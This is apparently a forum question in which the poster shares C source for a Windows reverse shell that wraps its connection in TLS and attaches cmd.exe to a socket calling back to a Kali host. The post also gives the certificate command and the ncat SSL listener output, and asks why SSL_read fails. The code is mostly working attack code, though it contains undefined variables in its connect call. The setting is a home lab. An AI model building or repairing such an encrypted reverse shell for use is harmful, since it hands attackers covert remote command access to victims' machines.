I make a reverse shell for testing purposes and have encrypted with SSL it below:

/*
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2def.h>

// openssl headers
#include <openssl/ssl.h>
#include <openssl/err.h>

// SSL functions
static SSL_CTX* create_context(){

    const SSL_METHOD *method;
    SSL_CTX *ctx;

    method = TLS_client_method();

    ctx = SSL_CTX_new(method);

    if(ctx == NULL){
        printf("[!] Unable to create SSL contextn");
        ERR_print_errors_fp(stderr);
        exit(0);
    }

    return ctx;
}
static void configure_client_context(SSL_CTX *ctx){
   
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
   
    // loading self signed certificate 
    if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
        printf("[!] Unable to verify location of cert.pemn");
        ERR_print_errors_fp(stderr);
        exit(0);
    }
}

int main()
{
  
  // SSL variables
  SSL_CTX *ssl_ctx = NULL;
  SSL *ssl;

  ssl_ctx = create_context();
     configure_client_context(ssl_ctx); // Added configuration for client context


  char placetogo[32] = "192.168.56.3" ; 
  int prt = 5000;

  TCHAR cmd[160] = TEXT("cmd.exe");

  WSADATA wsaData;
  WSAStartup(MAKEWORD(2, 2), &wsaData);
  SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL); 
  STARTUPINFO ini_processo;
  PROCESS_INFORMATION processo_info;

  struct sockaddr_in infsok;    
  infsok.sin_port = htons(prt)  ;
  int sz = sizeof(infsok);


  infsok.sin_family = 2;
  struct hostent *host; 
  char placetogo2[8] ;

  host = gethostbyname(placetogo);
  strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));


  infsok.sin_addr.s_addr = inet_addr(placetogo);
  memset(&ini_processo, 0, sizeof(ini_processo));

  const sockaddr *name = (SOCKADDR*)&infsok;

  ini_processo.cb = sizeof(ini_processo);
  ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 
  ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;

  
    connect(x, name, w); 



      // create SSL structure 
    ssl = SSL_new(ssl_ctx);
    if(!SSL_set_fd(ssl, newConn)){
        printf("[!] Unable to create client SSL structre...n");
        ERR_print_errors_fp(stderr);
        exit(0);
    }

  
    SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
    if(!SSL_set1_host(ssl, placetogo)){     // checking hostname 
        printf("[!] Hostname check failed...n");
        ERR_print_errors_fp(stderr);
        exit(0);
    }


  if (SSL_connect(ssl) == 1){
        printf("[*] Successful SSL connection innitiatedn");
        CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
  }
  else{
      printf("[!] SSL connection failed...n");
      printf("[*] Last WSA error: %i", WSAGetLastError());
      ERR_print_errors_fp(stderr);
    if(ssl != NULL){
        SSL_shutdown(ssl);
        SSL_free(ssl);
    }
    SSL_CTX_free(ssl_ctx);
  }


  return 0;
}

The IP, 192.168.56.3 is my kali linux machine and the cert.pem is generated as follows:

openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"

The reverse shell is ran in my windows 11 VM, and when I start my ncat listener on my kali machine and get this SSL_read error (after I execute my shell) that I can’t find any specifics about:

ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v

Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Enter PEM pass phrase:
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
                                                                       

I’ve also tried socat to no avail. Does anyone know what I can do to debug this more effectively? Or is it a certificate issue? I’ve also disabled windows firewall to make sure it wasn’t something there. I created a shared directory between my kali machine and the VM so they are using the same certificate and being executed in the same place.